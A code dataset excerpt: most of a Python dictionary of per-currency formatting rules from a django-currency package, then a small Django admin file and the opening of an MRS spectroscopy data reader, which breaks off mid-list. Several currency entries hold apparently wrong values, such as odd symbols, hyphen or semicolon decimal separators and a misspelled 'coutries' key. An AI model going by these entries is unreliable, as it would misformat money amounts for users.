POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Egyptian pound',
'countries': ['Egypt', 'EG']
},
'ERN': {
# SYMBOL: u'$',
'name': 'Eritrean nakfa',
'countries': ['Eritrea']
},
'ESP': {
SYMBOL: u'₧',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Spanish peseta',
'countries': ['ES']
},
'ETB': {
SYMBOL: u'ETB',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Ethiopian birr',
'countries': ['Ethiopia', 'ET']
},
'EUR': {
SYMBOL: u'€',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Euro',
'countries': ['17 European Union countries, Andorra, Kosovo, Monaco, Montenegro, San Marino, Vatican City; see eurozone', 'ES', 'FR', 'AT', 'DE', 'LU', 'GR', 'IE', 'FI', 'BE', 'NL', 'IT', 'PT', 'SK', 'LI', 'SI', 'ST']
},
'FJD': {
SYMBOL: u'$',
'name': 'Fiji dollar',
'countries': ['Fiji', 'FJ']
},
'FKP': {
SYMBOL: u'£',
'name': 'Falkland Islands pound',
'countries': ['Falkland Islands']
},
'GBP': {
SYMBOL: u'£',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Pound sterling',
'countries': ['GB']
},
'GEL': {
SYMBOL: u'Lari',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Georgian lari',
'countries': ['GE']
},
'GHS': {
# SYMBOL: u'₵',
'name': 'Ghanaian cedi',
'countries': ['Ghana']
},
'GIP': {
SYMBOL: u'£',
'name': 'Gibraltar pound',
'countries': ['Gibraltar', 'GI']
},
'GMD': {
# SYMBOL: u'$',
'name': 'Gambian dalasi',
'countries': ['Gambia', 'GM']
},
'GNF': {
# SYMBOL: u'$',
'name': 'Guinean franc',
'countries': ['Guinea', 'GN']
},
'GTQ': {
SYMBOL: u'Q',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Guatemalan quetzal',
'countries': ['GT']
},
'GYD': {
SYMBOL: u'$',
'name': 'Guyanese dollar',
'countries': ['Guyana', 'GY']
},
'HKD': {
SYMBOL: u'HK$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Hong Kong dollar',
'countries': ['HK']
},
'HNL': {
SYMBOL: u'L.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Honduran lempira',
'countries': ['HN']
},
'HRK': {
SYMBOL: u'kn',
'name': 'Croatian kuna',
'countries': ['HR']
},
'HTG': {
# SYMBOL: u'$',
'name': 'Haitian gourde',
'countries': ['Haiti', 'HT']
},
'HUF': {
SYMBOL: u'Ft',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Hungarian forint',
'coutries': ['HU']
},
'IDR': {
SYMBOL: u'Rp',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Indonesian rupiah',
'countries': ['ID']
},
'ILS': {
SYMBOL: u'₪',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Israeli new sheqel',
'countries': ['IL']
},
'INR': {
SYMBOL: u'Rs.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Indian rupee',
'countries': ['IN']
},
'IQD': {
SYMBOL: u'د.ع.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Iraqi dinar',
'countries': ['IQ'],
},
'IRR': {
SYMBOL: u'ريال',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '/',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Iranian rial',
'countries': ['Iran', 'IR']
},
'ISK': {
SYMBOL: u'kr.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Icelandic króna',
'countries': ['IS']
},
'JMD': {
SYMBOL: u'J$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Jamaican dollar',
'countries': ['JM']
},
'JOD': {
SYMBOL: u'د.ا.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Jordanian dinar',
'countries': ['JO'],
},
'JPY': {
SYMBOL: u'¥',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Japanese yen',
'countries': ['JP']
},
'KES': {
SYMBOL: u'S',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Kenyan shilling',
'countries': ['KE']
},
'KGS': {
SYMBOL: u'сом',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '-',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Kyrgyzstani som',
'countries': ['KG']
},
'KHR': {
SYMBOL: u'៛',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Cambodian riel',
'countries': ['Cambodia', 'KH']
},
'KMF': {
'name': 'Comoro franc',
# SYMBOL: u'$',
'countries': ['Comoros', 'KM']
},
'KPW': {
'name': 'North Korean won',
SYMBOL: u'₩',
'countries': ['North Korea', 'KP']
},
'KRW': {
SYMBOL: u'₩',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'South Korean won',
'countries': ['KR']
},
'KWD': {
SYMBOL: u'د.ك.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Kuwaiti dinar',
'countries': ['KW'],
},
'KYD': {
SYMBOL: u'$',
'name': 'Cayman Islands dollar',
'countries': ['Cayman Islands', 'KY']
},
'KZT': {
SYMBOL: u'Т',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '-',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Kazakhstani tenge',
'countries': ['KZ']
},
'LAK': {
SYMBOL: u'₭',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'({value}{symbol})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Lao kip',
'countries': ['LA']
},
'LBP': {
SYMBOL: u'ل.ل.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Lebanese pound',
'countries': ['LB']
},
'LKR': {
SYMBOL: u'රු.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Sri Lanka rupee',
'countries': ['LK']
},
'LRD': {
SYMBOL: u'$',
'name': 'Liberian dollar',
'countries': ['Liberia', 'LR']
},
'LSL': {
# SYMBOL: u'$',
'name': 'Lesotho loti',
'countries': ['Lesotho', 'LS']
},
'LTL': {
SYMBOL: u'Lt',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Lithuanian litas',
'countries': ['LT']
},
'LUF': {
SYMBOL: u'F',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Luxembourg franc',
'countries': ['LU']
},
'LVL': {
SYMBOL: u'Ls',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Latvian lats',
'countries': ['LV']
},
'LYD': {
SYMBOL: u'د.ل.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Libyan dinar',
'countries': ['LY']
},
'MAD': {
SYMBOL: u'د.م.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Moroccan dirham',
'countries': ['MA'],
},
'MDL': {
'name': 'Moldovan le',
# SYMBOL: u'$',
'countries': ['Moldova (except Transnistria)', 'MD']
},
'MGA': {
# SYMBOL: u'$',
'name': 'Malagasy ariary',
'countries': ['Madagascar', 'MG']
},
'MKD': {
SYMBOL: u'ден.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Macedonian denar',
'countries': ['MK']
},
'MMK': {
# SYMBOL: u'$',
'name': 'Myanma kyat',
'countries': ['Myanmar', 'MM']
},
'MNT': {
SYMBOL: u'₮',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Mongolian tugrik',
'countries': ['MN']
},
'MOP': {
SYMBOL: u'MOP',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Macanese pataca',
'countries': ['MO']
},
'MRO': {
# SYMBOL: u'$',
'name': 'Mauritanian ouguiya',
'countries': ['Mauritania', 'MR']
},
'MTL': {
SYMBOL: u'Lm',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Maltese lira',
'countries': ['MT']
},
'MUR': {
SYMBOL: u'₨',
'name': 'Mauritian rupee',
'countries': ['Mauritius', 'MU']
},
'MVR': {
SYMBOL: u'ރ.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'{value} {symbol}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Maldivian rufiyaa',
'countries': ['MV']
},
'MWK': {
# SYMBOL: u'$',
'name': 'Malawian kwacha',
'countries': ['Malawi', 'MW']
},
'MXN': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Mexican peso',
'countries': ['MX']
},
# 'MXV': {
# 'name': 'Mexican Unidad de Inversion (UDI) (funds code)',
# SYMBOL: u'$',
# 'countries': ['Mexico']
# },
'MYR': {
SYMBOL: u'RM',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Malaysian ringgit',
'countries': ['MY']
},
'MZN': {
SYMBOL: u'MT',
'name': 'Mozambican metical',
'countries': ['Mozambique', 'MZ']
},
'NAD': {
SYMBOL: u'$',
'name': 'Namibian dollar',
'countries': ['Namibia', 'NA']
},
'NGN': {
SYMBOL: u'₦',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Nigerian naira',
'countries': ['NG']
},
'NIO': {
SYMBOL: u'C$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Cordoba oro',
'countries': ['NI']
},
'NOK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Norwegian krone',
'countries': ['NO']
},
'NPR': {
SYMBOL: u'रु',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Nepalese rupee',
'countries': ['NP']
},
'NZD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'New Zealand dollar',
'countries': ['NZ']
},
'OMR': {
SYMBOL: u'ر.ع.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Omani rial',
'countries': ['Oman', 'OM']
},
'PAB': {
SYMBOL: u'B/.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Panamanian balboa',
'countries': ['PA']
},
'PEN': {
SYMBOL: u'S/.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Peruvian nuevo sol',
'countries': ['PE']
},
'PGK': {
# SYMBOL: u'$',
'name': 'Papua New Guinean kina',
'countries': ['Papua New Guinea', 'PG']
},
'PHP': {
SYMBOL: u'Php',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Philippine peso',
'countries': ['PH']
},
'PKR': {
SYMBOL: u'Rs',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Pakistani rupee',
'countries': ['PK']
},
'PLN': {
SYMBOL: u'zł',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': u'Polish złoty',
'countries': ['PL']
},
'PYG': {
SYMBOL: u'Gs',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Paraguayan guaraní',
'countries': ['Paraguay', 'PY']
},
'QAR': {
SYMBOL: u'ر.ق.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Qatari rial',
'countries': ['QA']
},
'RON': {
SYMBOL: u'lei',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Romanian new le',
'countries': ['RO']
},
'RSD': {
SYMBOL: u'Дин.',
'name': 'Serbian dinar',
'countries': ['Serbia', 'CS']
},
'RUB': {
SYMBOL: u'һ.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Russian rouble',
'countries': ['RU']
},
'RWF': {
SYMBOL: u'RWF',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Rwandan franc',
'countries': ['RW']
},
'SAR': {
SYMBOL: u'ر.س.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Saudi riyal',
'countries': ['SA']
},
'SBD': {
SYMBOL: u'$',
'name': 'Solomon Islands dollar',
'countries': ['Solomon Islands', 'SB']
},
'SCR': {
SYMBOL: u'₨',
'name': 'Seychelles rupee',
'countries': ['Seychelles', 'SC']
},
'SDG': {
# SYMBOL: u'$',
'name': 'Sudanese pound',
'countries': ['Sudan', 'SD']
},
'SEK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Swedish krona/kronor',
'countries': ['SE']
},
'SGD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Singapore dollar',
'countries': ['SG']
},
'SHP': {
SYMBOL: u'£',
'name': 'Saint Helena pound',
'countries': ['Saint Helena', 'SH']
},
'SLL': {
# SYMBOL: u'$',
'name': 'Sierra Leonean leone',
'countries': ['Sierra Leone', 'SL']
},
'SOS': {
SYMBOL: u'S',
'name': 'Somali shilling',
'countries': ['Somalia (except Somaliland)', 'SO']
},
'SRD': {
SYMBOL: u'$',
'name': 'Surinamese dollar',
'countries': ['Suriname', 'SR']
},
'STD': {
# SYMBOL: u'$',
'name': u'São Tomé and Príncipe dobra',
'countries': ['São Tomé and Príncipe', 'ST']
},
'SYP': {
SYMBOL: u'ل.س.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Syrian pound',
'countries': ['SY']
},
'SZL': {
# SYMBOL: u'$',
'name': 'Lilangeni',
'countries': ['Swaziland', 'SZ']
},
'THB': {
SYMBOL: u'฿',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Thai baht',
'countries': ['TH']
},
'TJS': {
SYMBOL: u'т.р.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ';',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Tajikistani somoni',
'countries': ['TJ']
},
'TMT': {
SYMBOL: u'm.',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Turkmenistani manat',
'countries': ['TM']
},
'TND': {
SYMBOL: u'د.ت.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Tunisian dinar',
'countries': ['TN']
},
'TOP': {
# SYMBOL: u'$',
'name': u'Tongan paʻanga',
'countries': ['Tonga', 'TO']
},
'TRY': {
SYMBOL: u'TL',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Turkish lira',
'countries': ['TR']
},
'TTD': {
SYMBOL: u'TT$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Trinidad and Tobago dollar',
'countries': ['TT']
},
'TWD': {
SYMBOL: u'NT$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'New Taiwan dollar',
'countries': ['TW']
},
'TZS': {
# SYMBOL: u'$',
'name': 'Tanzanian shilling',
'countries': ['Tanzania', 'TZ']
},
'UAH': {
SYMBOL: u'грн.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Ukrainian hryvnia',
'countries': ['UA']
},
'UGX': {
# SYMBOL: u'$',
'name': 'Ugandan shilling',
'countries': ['Uganda', 'UG']
},
'USD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'United States dollar',
'countries': ['US', 'EC', 'PR', 'SV']
},
'UYU': {
SYMBOL: u'$U',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Uruguayan peso',
'countries': ['UY']
},
'UZS': {
SYMBOL: u'сўм',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Uzbekistan som',
'countries': ['Uzbekistan', 'UZ']
},
'VEF': {
SYMBOL: u'Bs',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Venezuelan bolívar fuerte',
'countries': ['VE']
},
'VND': {
SYMBOL: u'₫',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Vietnamese dong',
'countries': ['VN']
},
'VUV': {
# SYMBOL: u'$',
'name': 'Vanuatu vat',
'countries': ['Vanuat', 'VU']
},
'WST': {
# SYMBOL: u'$',
'name': 'Samoan tala',
'countries': ['Samoa', 'WS']
},
'XAF': {
SYMBOL: u'$',
'name': 'CFA franc BEAC',
'countries': ['Cameroon, Central African Republic, Republic of the Congo, Chad, Equatorial Guinea, Gabon', 'CM', 'CF', 'CG', 'TD', 'GQ', 'GA']
},
'XCD': {
SYMBOL: u'$',
'name': 'East Caribbean dollar',
'countries': ['Anguilla, Antigua and Barbuda, Dominica, Grenada, Montserrat, Saint Kitts and Nevis, Saint Lucia, Saint Vincent and the Grenadines', 'AI', 'AG', 'DM', 'GD', 'MS', 'KN', 'LC', 'VC']
},
'XOF': {
SYMBOL: u'XOF',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'CFA Franc BCEAO',
'countries': ["Benin, Burkina Faso, Côte d'Ivoire, Guinea-Bissau, Mali, Niger, Senegal, Togo", 'SN']
},
'XPF': {
# SYMBOL: u'$',
'name': 'CFP franc',
'countries': ['French Polynesia, New Caledonia, Wallis and Futuna', 'PF', 'NC', 'WF']
},
'YER': {
SYMBOL: u'ر.ي.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Yemeni rial',
'countries': ['Yemen', 'YE']
},
'ZAR': {
SYMBOL: u'R',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'South African rand',
'countries': ['ZA']
},
'ZMK': {
# SYMBOL: u'$',
'name': 'Zambian kwacha',
'countries': ['Zambia', 'ZM']
},
'ZWL': {
SYMBOL: u'Z$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Zimbabwe dollar',
'countries': ['ZW']
},
}
|
allanlei/django-currency
|
currencies/__init__.py
|
Python
|
bsd-3-clause
| 35,230
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import TimeSession
# Register your models here.
admin.site.register(TimeSession)
|
mooja/eisenhower_dashboard
|
eisenhower_dashboard/matrix/admin.py
|
Python
|
mit
| 193
|
from suspect import MRSData, transformation_matrix
import numpy
import struct
import re
# The RDA format consists of a large number of key value pairs followed by raw
# data. The values need to be cast into different datatypes depending on the
# key, this dictionary stores a mapping of key to datatype.
rda_types = {
"floats": ["PatientWeight", "TR", "TE", "TM", "TI", "DwellTime", "NumberOfAverages",
